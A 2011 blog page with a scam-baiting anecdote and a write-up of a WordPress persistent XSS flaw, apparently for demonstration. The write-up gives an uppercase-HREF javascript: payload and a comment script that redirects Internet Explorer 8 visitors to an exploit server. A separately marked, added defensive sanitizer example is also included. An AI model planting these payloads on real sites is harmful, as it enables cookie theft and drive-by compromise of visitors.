Sunday, November 6, 2011

Have fun with scammers

A couple of days ago I received this e-mail:


After reading it I decided to go on and have some fun with him, so I replied, and after one day I got the response.


To convince me, he attached four pictures of the flat. Here are the living room and my future bedroom.



Anyone can see that this picture is from a five-star hotel, but to be really sure I used Google search by image. What did I find? These images are from a hotel in the center of Milan.

Things were getting interesting, so I decided to find out how I could get this awesome flat.


His response.

Now it's time to send him my personal information in a PDF.




After this e-mail I haven't gotten any response. Maybe he is angry with me, but I don't know why :(.

Tuesday, November 1, 2011

Wordpress XSS Vulnerability + IE 8 Exploit

On December 30, 2010, a guy named sneak reported a persistent XSS vulnerability that affects the popular blog CMS WordPress <= 3.0.3.

The problem is located in the kses.php file, which is the HTML sanitization library. If we type a link with the href attribute written in capital letters, this library doesn't filter the content properly.

Example:
<a HREF="javascript:alert(0)">CLICK HERE</a>

If we post a comment, this tag will be accepted as a common link. With this vulnerability we can craft a piece of code that can steal cookies, redirect to other sites, etc.
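To see why the capital-letter attribute slips through and what the fix looks like, here is an added example that is not from the original post and is not WordPress's code: a simplified model of a sanitizer whose URL-scheme check matches the attribute name case-sensitively, next to a hardened version. All names are hypothetical, and attribute values are assumed to be already parsed and entity-decoded.

```javascript
// Simplified model of the flaw described above; NOT the code of WordPress's kses.php.
// Names (ALLOWED_ATTRS, sanitizeVulnerable, ...) are hypothetical. Attributes arrive as
// [name, value] pairs, assumed already parsed and entity-decoded by an HTML parser.
const ALLOWED_ATTRS = ['href', 'title'];
const URI_ATTRS = ['href'];
const ALLOWED_SCHEMES = ['http', 'https', 'mailto'];

// True when the URL is relative or uses an allowlisted scheme.
function schemeAllowed(value) {
  // Browsers strip leading control characters and embedded tabs/newlines from URLs;
  // remove all of them (conservatively) before matching the scheme.
  const cleaned = value.replace(/[\u0000-\u0020]+/g, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  return m === null || ALLOWED_SCHEMES.includes(m[1].toLowerCase());
}

// Vulnerable: the allowlist lookup is case-insensitive, but the "is this a URL
// attribute?" test uses the raw name, so "HREF" never reaches schemeAllowed().
function sanitizeVulnerable(attrs) {
  return attrs.filter(([name, value]) =>
    ALLOWED_ATTRS.includes(name.toLowerCase()) &&
    (!URI_ATTRS.includes(name) || schemeAllowed(value)));
}

// Hardened: HTML attribute names are case-insensitive, so normalise the name once
// and use the normalised form for every decision.
function sanitizeHardened(attrs) {
  return attrs.filter(([name, value]) => {
    const n = name.toLowerCase();
    return ALLOWED_ATTRS.includes(n) && (!URI_ATTRS.includes(n) || schemeAllowed(value));
  });
}

// Constructed samples: the attribute from the comment shown on this page, plus variants.
const samples = [
  [['href', 'javascript:alert(0)']],
  [['HREF', 'javascript:alert(0)']],
  [['HrEf', ' JaVaScRiPt:alert(0)']],
  [['HREF', 'http://example.com/']],
];
for (const attrs of samples) {
  console.log(JSON.stringify(attrs),
    '| vulnerable keeps', sanitizeVulnerable(attrs).length,
    '| hardened keeps', sanitizeHardened(attrs).length);
}
```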

This video shows how easy it can be for anyone to craft an evil comment that redirects the victim to a server hosting an exploit for Internet Explorer 8 (CVE-2010-3971).

Our evil code:
var s = navigator.userAgent;

if( s.search('MSIE 8.0') != -1 ) {
    window.location = "http://192.168.2.13:8080/news";
}


References and more detailed information:
- Sneak blog 
- Metasploit Unleashed
- Javascript Obfuscator